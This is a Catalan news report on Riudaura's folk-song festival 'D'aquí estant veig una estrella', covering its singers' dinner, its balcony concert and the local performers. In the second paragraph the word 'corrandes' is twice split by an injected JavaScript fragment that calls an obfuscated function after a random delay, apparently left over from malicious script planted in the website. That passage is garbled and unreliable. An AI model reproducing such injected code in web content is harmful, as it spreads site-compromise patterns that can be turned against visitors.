Riudaura consolida davant d’unes 700 persones, el format del Festival D’aquí estant veig una estrella

Comparteix-ho amb els teus amics:

Unes 700 persones han gaudit de les cançons de tradició oral

Ja fa onze anys de la publicació del llibre D’aquí estant veig una estrella: cançons de tradició oral a Riudaura i del concert que es va organitzar per a presentar-lo al públic. Avui, aquell llibre s’ha convertit en un Festival plenament consolidat en el format de dos dies iniciat l’any passat. La Plaça del Gambeto de Riudaura s’ha omplert més que mai de cançons i tonades i també de molt públic, de fet ha estat l’edició més concorreguda.

El divendres 28 es va celebrar el Sopar de cantadors amb prop de dos-cents assistents i va comptar amb l’actuació del grup de polifonia vocal Els Tranquils. Els osonencs Ramon Manent, Andreu Coll i Manel Gost van entusiasmar el públic amb el seu repertori. Prop d’una vintena de cantadors van atrevir-se a cantar durant el sopar, i, com no podia ser d’una altra manera, el van iniciar cantant el D’aquí estant veig una estrella, les corrandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andes que en el seu dia va cantar la Maria Julià, de Can Pitansa, la molinera i que precisament, el primer vers d’una d’aquestes corrandom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andes va donar nom al llibre i dóna també nom a aquest festival.

El dissabte 29 els balcons de la Plaça del Gambeto s’han convertit en escenaris d’una vetllada seguida per més de cinc-centes persones. Com ja és tradicional en aquest concert, una versió del Ball del Gambeto o del Roser ha encetat les intervencions musicals.

En aquesta ocasió ha estat una versió interpretada a l’acordió per Carles Belda i al violí per Coloma Bertran.

Un magnífic Càntut, que ha posat dempeus el públic, ha estat la part central del concert. El cantant, guitarrista i ànima del grup Sanjosex, Carles Sanjosé, aliat amb l’acordionista diatònic sabadellenc de formacions com Pomada, Mesclat, el Conjunt Badabadoc…, Carles Belda s’han submergit de ple en el cançoner online Càntut: Cançons i músiques dels avis, impulsat per l’Albert Massip, de Banyoles. Han acabat amb una versió del General Bum-Bum acompanyats pels nens i nenes del Casal d’estiu de Riudaura.

I és que una part important del concert ha estat protagonitzada pels propis riudaurencs, des dels més menuts fins als veterans. Una vintena de cantadors ha interpretat diverses cançons des de balcons i racons de la Plaça: Una matinada fresca; Jeroni, si vols casar-te; Caterina, l’amor; o el gitano… I per completar les actuacions de la gent de Riudaura, dues formacions musicals creades expressament per l’ocasió han presentat actualitzacions del cançoner popular i tradicional: Blancaflor, Els dotze lladres de Puigcerdà, Silenci, Goigs de Sant Climent, Fadrins que en festegeu, Déu lo guard, mestre Joan i L’aigat d’Olot.

El concert ha acabat amb una interpretació conjunta de la cançó que dóna nom al llibre de cançons i tonades de Riudaura i que també dóna nom a aquest concert de música tradicional: D’aquí estant veig una estrella.

Info i fotos: Grup de Recerca Folklòrica de la Garrotxa de Marboleny

VÍDEOS RELACIONAT:

Vídeo: D’aquí estant veig una estrella 2015

https://vimeo.com/135168323

Vídeo: D’aquí estant veig una estrella 2014

https://vimeo.com/102427283

Vídeo: D’aquí estant veig una estrella 2012

Comparteix-ho amb els teus amics: